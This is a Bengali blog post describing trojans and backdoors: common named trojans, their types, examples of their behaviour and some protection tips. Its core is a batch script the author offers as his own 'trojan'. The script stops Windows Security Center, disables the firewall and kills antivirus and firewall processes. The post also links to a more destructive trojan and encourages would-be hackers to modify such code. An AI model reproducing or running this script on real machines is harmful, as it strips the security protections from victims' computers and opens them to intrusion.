ট্রোজান ইঞ্জেক্টিং ও ট্রোজান ব্যাকডোর নিয়ে কিছু কথা …

3
617

ট্রোজান আর ব্যাক ডোর হল দুটি পদ্ধতি যার মাধ্যমে একজন হ্যাকার কোন সিস্টেম এ প্রবেশ করতে পারেন ।সাধারনত ব্যাক ডোর বা ট্রোজান একটি সিস্টেম এ অন্য কোন প্রোগ্রাম এর মাধ্যমে প্রবেশ করে ।ইথিকাল হ্যাকার সাধারন ভাবে পরীক্ষা করার জন্য এগুলো ব্যাবহার করে থাকেন । এই দুটি হল ম্যালওয়ার এর একটি রুপ যা অন্য কোন সার্ভার এ অন্য ফাইল এর মাধ্যমে যাবার চেষ্টা করে ।
আর ব্যাক ডোর বলতে বোঝানো হয় একটি পথ তৈরি করা যার মাধ্যমে  ট্রোজান কোন সিস্টেম এ প্রবেশ করে। সাধারনত ট্রোজান কোন অন্য ছবি বা মিউজিক ফাইল এর মাধ্যমে ছড়িয়ে যায় । এতে Steganography পদ্ধতি টি ব্যাবহার করা হয় । এটি সম্পর্কে না যানলে আমি এ নিয়ে লিখেছি । সেটি পড়ে নিবেন ।। সাধারন ভাবে ট্রোজান ছড়ানোর সবথেকে সহজ উপায় হল ব্যাচ ফাইল বা একে .exe তে রুপান্তর করে ইন্সটলার এর মাধ্যমে ছড়িয়ে দেয়া । এতে হ্যাকার রা বিভিন্ন ধরনের GUI ব্যাবহার করেন অন্য দের আকৃষ্ট করার জন্য ।

কয়েকটি কমন ট্রোজান  :

BackOrifice
Deep Throat
NetBus
Whack a mole
Girlfriend
Masters Paradise

এগুলর মধ্যে সবথেকে বিপদজনক হচ্ছে  Girlfriend এবং Netbus । কারন এগুলো ব্যাচ ফাইল এর মাধ্যমে তৈরি করা যায় । এবং কোডের কয়েকটি লাইন পরিবর্তন করে দিলেই দুর্ধর্ষ ভাইরাস  এ পরিনত হয় । আপনি যদি হ্যাকার হতে চান বা সিকিউরিটি নিয়ে কাজ করতে চান আপনাকে অবশ্যই এগুলো নিয়ে কাজ করতে হবে । কিন্তু নিজের কম্পিউটার এ গুলো নিয়ে ঘাটাঘাটি না করে কোন ভার্চুয়াল পরিবেশ তৈরি করাই ভাল । যেমন যারা Comodo  এর ভার্চুয়াল সিকিউরিটি ব্যাবহার করেন তারা যানেন । এই ভাইরাস গুলো নিয়ে কাজ করা কতটা বিপদজনক ।

ট্রোজান এর প্রকারভেদ
বিভিন্ন ধরেনের ট্রোজান আছে । সেগুলর কয়েকটি নিচে তুলে ধরা হল :
Remote Access Trojans : কোন সিস্টেম এ রিমোট অ্যাক্সেস পেতে ব্যাবহার করা হয়

Data Sending Trijans : এটি সাধারনত ডাটা খুঁজে বের করে হ্যাকার এর কাছে তা পাঠিয়ে দেয় ।

Destructive Trojans: এর সাহায্যে কম্পিউটার এর ক্ষতি করা হয় ।

FTP trojans: এটিকে ব্যাবহার করতে হ্যাকার রা port 21 ব্যাবহার করে থাকেন ।

SSDT: এটির পূর্ণরূপ আপনারা কাজ শুনলেই বুঝতে পারবেন । এর মাধ্যমে কোন নির্দিষ্ট বা অনেকগুল antivirus প্রোগ্রাম কে অকেজ   করে দেয়া হয় ।

কয়েকটি ট্রোজান প্রোগ্রাম

Troj_OAJ

এই ট্রোজান টি যে কোন নোটপ্যাড ফাইল কে টারগেট করে । এরপর সেটিকে word ফরমেট পরিবর্তন করে note.com এ নিয়ে যায় । এরপর সেটি windows এর নোটপ্যাড ফোল্ডার এ কপি হয় । এরপর আপনি যতবার নোটপ্যাড খুলবেন ততবার এই ভাইরাস টি আক্টিভ হবে ।
Donald Duck

এটি একটি ব্যাক ডোর ট্রোজান । এটি হ্যাকার কে যেকোনো সিস্টেম এ পুরপরি নিয়ন্ত্রন এনে দেয় । এটার সাথে একটি কি লগার এবং রেজিস্ট্রি এডিট করার প্রগ্রাম থাকে ।এর সাহায্যে সিডি বা ডিভিডি রম খোলা বা বন্ধ করাও সম্ভব হয় । এটি ইঞ্জেক্ট করতে হ্যাকার23476 ও ২৩৪৭৭ ব্যাবহার করে থাকেন

CyberSpy

এটি মূলত একটি স্পাই প্রোগ্রাম । এটি রেজিস্ট্রি তে নিজেকে এন্ট্রি করে নেয়। যার ফলে আন্টিভাইরাস দিয়ে ডিলিট করে দিলেও কম্পিউটার রিবুট করলে আবার এটি আক্টিভ হয়ে যায় ।

Firekill 2000
এই ট্রোজান টি মারাত্তক । এটি সব ধরনের ফায়ারওয়াল , এন্টিভাইরাস কে disable করে দিতে সক্ষম । এমনকি এটি সিকিউরিটি সফটওয়্যার এর নিরাপত্তা  কে ধ্বংস করতে .dll ফাইল কে ডিলিট করে দেয় । তখন সিস্টেম আবার সেটআপ দিতে হয় ।

এছাড়া আর অনেক ট্রোজান প্রোগ্রাম আছে । অনেক ট্রোজান Netcat এর সাহায্যে launch করা হয় । আবার অনেক ট্রোজান সার্ভার রুটিং করে ইঞ্জেক্ট করা হয় ।

একটি ট্রোজান ভাইরাস
এটি আমার নিজের কোড করা একটি ছোট ট্রোজান । এটি এন্টিভাইরাস এর সিকিউরিটি কে রুখে দিতে পারবে ।  এটি মূলত আপনার ওয়িন্দএস এর ফায়ার ওয়াল ও এন্টিভাইরাস এর safe guard কে রুখে দেবে । এটির ইন্টারফেস সবুজ রঙের।  
@ echo off
_Rashed Hasan_

∙ rem –
  colour Db 03
∙ rem Permanently Kill Anti-Virus
∙ net stop “Security Center”
netsh firewall set opmode mode=disable ∙ tskill /A av* ∙
tskill /A fire*
tskill /A […].
_BCA_
আপনাদেরকে আর ও একটি বিধ্বংসী ট্রোজান এর লিঙ্ক দিতে পারি । কিন্তু সেটি কম্পিউটার এ রান করবেন না । একটি সহজ ট্রিক হচ্ছে কপি পেস্টিং সাইট যেমন http://www.pastebin.com এ যেয়ে পেস্ট করে সেভ করবেন। সেটি যদি কোন ভাইরাস হয় তবে দেখতে পাবেন আপনার এন্টিভাইরাস সিকিউরিটি warning দেবে। আর সেই লিঙ্ক এ প্রবেশ করতে  গেলে আপনার ব্রাউযার থেমে যাবে ।
এই ভাইরাস টি কোন অবস্থাতেই রান করবেন না । এটি ভারতের একজন সিকিউরিটি এক্সপার্ট এর কোড করা
http://www.breakthesecurity.com/2010/12/how-to-disabledelete-your-victims.html


বাঁচার কিছু উপায়
> আপনি যে এন্টিভাইরাস ব্যাবহার করে থাকুন না কেন সেটি আপ টু ডেট থাকতে হবে ।
> সন্দেহ জনক কোন টুল বা লিঙ্ক এ ক্লিক করবেন না ।
> আপনার antivirus এর পাশাপাশি  anti spam ও anti rootkit ব্যাবহার করবেন । আমি বলব অ্যান্টিভাইরাস এর সাথে আপনি kaspersky এর TDS killer টুল টী ব্যাবহার করতে পারেন । এটি পুরো পুরি পোর্টেবল একটি টুল ।

তাহলে আজ এই পর্যন্তই ছিল ।
এরকম অনেক কিছু > http://www.facebook.com/cy133r
আর আমি আছি > http://www.facebook.com/techfreak.unknown
আল্লাহ হাফেয
…………………………………………………….10%3iNfInitY…………………………………………………………….

3 মন্তব্য

একটি উত্তর ত্যাগ